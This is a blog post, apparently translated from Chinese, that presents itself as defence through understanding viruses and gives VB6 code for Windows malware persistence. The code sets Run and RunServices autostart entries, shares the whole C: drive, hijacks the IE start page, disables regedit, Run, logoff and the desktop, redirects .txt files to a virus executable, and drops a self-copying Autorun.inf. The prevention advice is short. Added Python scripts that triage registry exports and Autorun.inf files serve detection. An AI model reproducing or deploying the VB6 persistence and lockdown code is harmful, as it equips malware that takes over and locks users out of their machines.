
Defending based on how viruses work: a practical hands-on analysis

Category: XAMPP案例   Author: 中文小张

Autostart by inserting the right keys and values in the registry

API declarations (VB6):
Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long
Private Const HKEY_LOCAL_MACHINE = &H80000002
Private Const REG_SZ = 1

A virus autostarts by creating an entry under a Run key. RunServices, used here, exists only on Windows 9x/ME; on NT-based Windows the same trick targets ...\CurrentVersion\Run. The code:
Dim hKey As Long
Dim cc As Long
Dim Mypath As String
Dim Wsh_shell As Object
Mypath = "<absolute path of the virus>"
cc = Len(Mypath) + 1                  ' size in bytes, including the terminating null
RegCreateKey HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\RunServices", hKey
RegSetValueEx hKey, "<value name>", 0, REG_SZ, ByVal Mypath, cc
RegCloseKey hKey
' The same sample goes on to write further entries through WScript.Shell: two more Run
' entries, a share of the whole C: drive (Windows 9x LanMan share settings), a hijacked
' IE start page and window title, and Explorer/System policies that disable Run,
' shutdown, logoff, drive display, the desktop and the registry editor.
Set Wsh_shell = CreateObject("WScript.Shell")
Wsh_shell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Systemm", Mypath, "REG_SZ"
Wsh_shell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Systemmm", "http://hsz.oor.cn", "REG_SZ"
Wsh_shell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\C$\Flags", "302", "REG_DWORD"
Wsh_shell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\C$\Type", "0", "REG_DWORD"
Wsh_shell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\C$\Path", "C:\"
Wsh_shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page", "www.baidu.com"
Wsh_shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title", "BLOG地址:http://www.baidu.com"
Wsh_shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "01", "REG_DWORD"
Wsh_shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose", "01", "REG_DWORD"
Wsh_shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff", "01", "REG_DWORD"
Wsh_shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives", "04", "REG_DWORD"
Wsh_shell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "01", "REG_DWORD"
Wsh_shell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop", "01", "REG_DWORD"
' Wsh_shell.RegWrite "", "01", "REG_DWORD"    ' the key path of this last write is missing in the original

After this code runs, the registry holds a startup entry for the virus.

Prevention: inspect the registry autostart locations for resident virus entries. I won't go into more detail here; anyone interested can ask me or search Baidu.

Launching by changing the file association of text files
The code:
API declarations:
Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegSetValue Lib "advapi32.dll" Alias "RegSetValueA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long
Const HKEY_CLASSES_ROOT = &H80000000
Const REG_SZ = 1
Implementation (the original ends with End Sub but lacks the Sub header, so one is added here):
Private Sub HijackTxtAssociation()
    Dim sKeyName As String       ' key name
    Dim sKeyValue As String      ' value data
    Dim MyReturn As Long         ' return code of the last API call
    Dim keyhandle As Long
    ' 1. Create a ProgID named "Test"; its default value is the friendly type name.
    sKeyName = "Test"
    sKeyValue = "Test Application"
    MyReturn = RegCreateKey(HKEY_CLASSES_ROOT, sKeyName, keyhandle)
    MyReturn = RegSetValue(keyhandle, "", REG_SZ, sKeyValue, 0&)     ' cbData is ignored for REG_SZ
    MsgBox MyReturn
    ' 2. Point the .txt extension at that ProgID.
    sKeyName = ".txt"            ' extension to associate
    sKeyValue = "Test"
    MyReturn = RegCreateKey(HKEY_CLASSES_ROOT, sKeyName, keyhandle)
    MyReturn = RegSetValue(keyhandle, "", REG_SZ, sKeyValue, 0&)
    ' 3. Make the ProgID's open verb run the virus; %1 becomes the double-clicked .txt file.
    sKeyName = "Test"
    sKeyValue = "D:\病毒.exe %1"   ' location and name of your own program (病毒.exe = virus.exe)
    MyReturn = RegCreateKey(HKEY_CLASSES_ROOT, sKeyName, keyhandle)
    MyReturn = RegSetValue(keyhandle, "shell\open\command", REG_SZ, sKeyValue, 0&)
End Sub
The above launches the virus by hijacking the TXT file association. Two caveats on NT-based Windows: new keys written under HKEY_CLASSES_ROOT land in HKLM\Software\Classes and so need administrator rights, and on Vista and later an existing per-user choice under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.txt\UserChoice takes precedence over HKCR, so the hijack does not take effect as written there.

Prevention: repair the registry, and use the FTYPE and ASSOC commands to restore the file association (on a clean machine "assoc .txt" prints .txt=txtfile and "ftype txtfile" prints txtfile=%SystemRoot%\system32\NOTEPAD.EXE %1; run on an infected machine, the same two commands also stop the virus from spreading and reinfecting through the hijacked association).
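Both the Run-key persistence above and the .txt association hijack leave traces that a reg export of the affected keys shows directly. The following Python script is an added example, not code from the article: it parses a .reg export (a constructed sample is embedded; the value names Systemm/Systemmm and the Test ProgID mirror the article's code, while the paths and the svch0st.exe name are made up), flags Run/RunOnce/RunServices entries whose image is outside the Windows or Program Files trees or sits in a Temp folder, resolves .txt to its ProgID and open command and compares them with the Windows default, and lists the Policies values the sample sets to block cleanup. The trusted-directory list is a heuristic of my own, not a Windows rule.

```python
"""Triage a Windows registry export for the persistence tricks described above.
Added example, not the article's code; SAMPLE_REG is constructed test data in
the format `reg export` writes."""
import re
from typing import Dict, List, Tuple

Registry = Dict[str, Dict[str, str]]   # key path -> {value name -> data}

# Constructed sample: two planted Run entries, a hijacked .txt association and
# the Explorer/System lockdown policies the article's sample sets.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="%windir%\\system32\\SecurityHealthSystray.exe"
"Systemm"="C:\\Windows\\Temp\\svch0st.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]
"Systemmm"="C:\\virus.exe"
[HKEY_CLASSES_ROOT\.txt]
@="Test"
[HKEY_CLASSES_ROOT\Test\shell\open\command]
@="D:\\virus.exe %1"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoRun"=dword:00000001
"NoDrives"=dword:00000004
'''
_VALUE_RE = re.compile(r'^(@|"(?:[^"\\]|\\.)*")=(.*)$')

def _unescape(s: str) -> str:
    return s.replace('\\"', '"').replace('\\\\', '\\')

def parse_reg(text: str) -> Registry:
    """Parse string and DWORD values of a .reg export; hex(...) binary data is skipped."""
    reg: Registry = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith('[') and line.endswith(']'):
            current = line[1:-1]
            reg.setdefault(current, {})
            continue
        m = _VALUE_RE.match(line) if current is not None else None
        if not m:
            continue
        name = '' if m.group(1) == '@' else _unescape(m.group(1)[1:-1])
        data = m.group(2)
        if data.startswith('"') and data.endswith('"'):
            reg[current][name] = _unescape(data[1:-1])
        elif data.startswith('dword:'):
            reg[current][name] = str(int(data[6:], 16))
    return reg

AUTOSTART_KEYS = ('\\currentversion\\run', '\\currentversion\\runonce', '\\currentversion\\runservices')
# Heuristic: legitimate autostart images live under these prefixes, and never in a Temp folder.
TRUSTED_DIRS = ('%windir%\\', '%systemroot%\\', 'c:\\windows\\', 'c:\\program files')

def image_path(command: str) -> str:
    """Executable part of a command line: the quoted path, else the first .exe token."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    m = re.match(r'(.+?\.exe)(\s|$)', command, re.IGNORECASE)
    return m.group(1) if m else command.split(' ')[0]

def check_autostart(reg: Registry) -> List[Tuple[str, str, str]]:
    """Flag Run/RunOnce/RunServices entries in any hive whose image is untrusted."""
    out = []
    for key, values in reg.items():
        if key.lower().endswith(AUTOSTART_KEYS):
            for name, command in values.items():
                path = image_path(command).lower()
                if not path.startswith(TRUSTED_DIRS) or '\\temp\\' in path:
                    out.append(('autostart', key + '\\' + name, command))
    return out

def check_txt_association(reg: Registry) -> List[Tuple[str, str, str]]:
    """Follow .txt -> ProgID -> shell\\open\\command (what ASSOC/FTYPE print); default is txtfile -> NOTEPAD.EXE."""
    hkcr = {k.lower(): v for k, v in reg.items()}
    progid = hkcr.get('hkey_classes_root\\.txt', {}).get('', '')
    cmd = hkcr.get('hkey_classes_root\\%s\\shell\\open\\command' % progid.lower(), {}).get('', '')
    out = []
    if progid.lower() != 'txtfile':
        out.append(('assoc', '.txt', progid))
    if cmd and 'notepad.exe' not in cmd.lower():
        out.append(('ftype', progid, cmd))
    return out

LOCKDOWN_POLICIES = {'disableregistrytools', 'norun', 'noclose', 'nologoff', 'nodrives', 'nodesktop'}

def check_lockdown_policies(reg: Registry) -> List[Tuple[str, str, str]]:
    """Flag Policies values a virus sets to keep the user from running regedit or cleaning up."""
    return [('policy', key + '\\' + name, data)
            for key, values in reg.items() if '\\policies\\' in key.lower()
            for name, data in values.items()
            if name.lower() in LOCKDOWN_POLICIES and data != '0']

def triage(text: str) -> List[Tuple[str, str, str]]:
    reg = parse_reg(text)
    return check_autostart(reg) + check_txt_association(reg) + check_lockdown_policies(reg)

if __name__ == '__main__':
    for kind, where, what in triage(SAMPLE_REG):
        print('[%s] %s -> %s' % (kind, where, what))
```

To check a live machine, export the keys of interest (for example reg export HKLM\Software\Microsoft\Windows\CurrentVersion\Run run.reg), read the file as UTF-16 LE (the encoding reg export writes) and pass the text to triage(). The embedded sample runs offline and yields seven findings: the two planted Run entries, the Test ProgID on .txt, its non-Notepad open command, and the three lockdown policies.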

Using Autorun.inf
CDs use this to autoplay, so I won't belabor it.

The code:
Dim a As String
If Dir("F:") <> "" Then a = App.Path & "\" & App.EXEName & ".exe"    ' original guard kept: the path is only set when F: is readable
FileCopy a, "C:\病毒.exe"                 ' copy the running program to the root of C:
Open "C:\Autorun.inf" For Output As #1    ' must sit in the drive root next to the copy
Print #1, "[autorun]"
Print #1, "OPEN=病毒.exe"
Close #1
That makes double-clicking the C: drive launch the virus. It relies on AutoRun being honoured for fixed drives: Windows 7 and later (and XP/Vista with the AutoRun update applied) ignore Autorun.inf on everything except optical media, so hard disks and USB sticks no longer launch this way.
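As an added example (not the article's code), this Python script parses an Autorun.inf and reports which directives would run a program. VIRUS_INF is exactly what the article's code writes; DISGUISED_INF and BENIGN_INF are constructed, including the RECYCLER path and the SID-like folder name. It goes one step beyond the text by also checking the shell= default-verb override, which is what changes the drive's double-click action in Explorer, whereas open= and shellexecute= cover the AutoPlay case.

```python
"""Inspect an Autorun.inf for launch directives, the mechanism in the section above.
Added example, not the article's code; the three INF texts below are constructed."""
from typing import Dict, List, Tuple

# Exactly what the article's sample writes to C:\Autorun.inf.
VIRUS_INF = "[autorun]\r\nOPEN=病毒.exe\r\n"
# Constructed: a disguised variant that hides behind a drive icon, uses shellexecute
# and rewires the default double-click verb so Explorer runs it even without AutoPlay.
DISGUISED_INF = ("[AutoRun]\r\n"
                 "icon=%SystemRoot%\\system32\\SHELL32.dll,4\r\n"
                 "shellexecute=RECYCLER\\S-1-5-21-1482476501\\x.exe\r\n"
                 "shell\\Open=&Open\r\n"
                 "shell\\Open\\command=RECYCLER\\S-1-5-21-1482476501\\x.exe\r\n"
                 "shell=Open\r\n")
# Constructed: a legitimate installer disc that only sets a label and an icon.
BENIGN_INF = "[autorun]\r\nlabel=Product Installer\r\nicon=setup.ico\r\n"

def parse_inf(text: str) -> Dict[str, Dict[str, str]]:
    """Minimal INI parser: section names and keys are case-insensitive in Autorun.inf,
    so both are lowercased; values are kept as written."""
    sections: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip().lstrip('\ufeff')
        if not line or line[0] in ';#':
            continue
        if line.startswith('[') and line.endswith(']'):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif current is not None and '=' in line:
            key, _, value = line.partition('=')
            sections[current][key.strip().lower()] = value.strip()
    return sections

def launch_directives(sections: Dict[str, Dict[str, str]]) -> List[Tuple[str, str]]:
    """Directives under [autorun] that run a program: open=, shellexecute=, and
    shell\\<verb>\\command= for any verb."""
    auto = sections.get('autorun', {})
    return [(k, v) for k, v in auto.items()
            if k in ('open', 'shellexecute')
            or (k.startswith('shell\\') and k.endswith('\\command'))]

def default_verb_hijacked(sections: Dict[str, Dict[str, str]]) -> bool:
    """True if shell=<verb> names a verb that has its own command, which changes what
    double-clicking the drive in Explorer does (independent of the AutoPlay prompt)."""
    auto = sections.get('autorun', {})
    verb = auto.get('shell', '').lower()
    return bool(verb) and ('shell\\%s\\command' % verb) in auto

def triage_autorun(text: str) -> Dict[str, object]:
    sections = parse_inf(text)
    launches = launch_directives(sections)
    return {'launches': launches,
            'default_verb_hijacked': default_verb_hijacked(sections),
            'runs_code': bool(launches)}

if __name__ == '__main__':
    for name, inf in (('article sample', VIRUS_INF), ('disguised', DISGUISED_INF), ('benign', BENIGN_INF)):
        print(name, triage_autorun(inf))
```

A file with no launch directive (label and icon only) is what a legitimate disc looks like; anything with open=, shellexecute= or a shell verb command deserves a look at the target file, and a hijacked default verb is a strong sign of the "double-click the drive" trick above.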

When reposting, please credit: XAMPP中文组官网 » Defending based on how viruses work: a practical hands-on analysis
